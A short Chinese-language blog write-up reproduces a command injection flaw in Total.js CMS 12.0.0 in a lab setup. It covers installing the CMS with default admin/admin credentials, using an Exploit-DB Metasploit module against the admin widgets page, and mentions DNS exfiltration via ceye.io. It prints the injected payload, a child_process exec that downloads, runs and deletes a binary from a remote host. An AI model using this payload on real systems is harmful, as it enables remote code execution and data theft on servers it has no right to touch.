Total.js CMS 命令注入漏洞復現

  • 2019 年 12 月 16 日
  • 筆記

0X01 漏洞概述

Total.js CMS是一套基於NoSQL資料庫的內容管理系統(CMS)。

Total.js CMS 12.0.0版本中存在命令注入漏洞,攻擊者可利用該漏洞執行非法命令。

0X02環境搭建

方法一:下載源碼

https://my.totaljs.com/  或者  https://github.com/totaljs/cms

Windows下安裝npm

參考:https://blog.csdn.net/zhao1949/article/details/53907827

到下載的Total.js CMS 12目錄下

npm install

nodedebug.js

訪問:http://127.0.0.1:8000/
http://127.0.0.1:8000/admin/    默認帳號密碼:admin/admin

注意圖標

0x03 漏洞利用

下載利用腳本

https://www.exploit-db.com/exploits/47531

添加到msf中,訪問

http://192.168.0.169:8000/admin/widgets/

這是植入的程式碼

<scripttotal>global.process.mainModule.require('child_process').exec("sleep2;wget -qO /tmp/XrwHzcVK http://192.168.92.145:8080/p_BYrIw;chmod +x /tmp/XrwHzcVK;/tmp/XrwHzcVK;rm-f /tmp/XrwHzcVK");</script>

遠程下載賦權執行然後刪除。

由於此處是windows系統,執行命令沒有回顯

保存 去目錄下發現了2.txt文件

可以結合DNS將數據外帶出去。

此處使用ceye.io

0x04修復建議

打修補程式。

投稿郵箱:[email protected]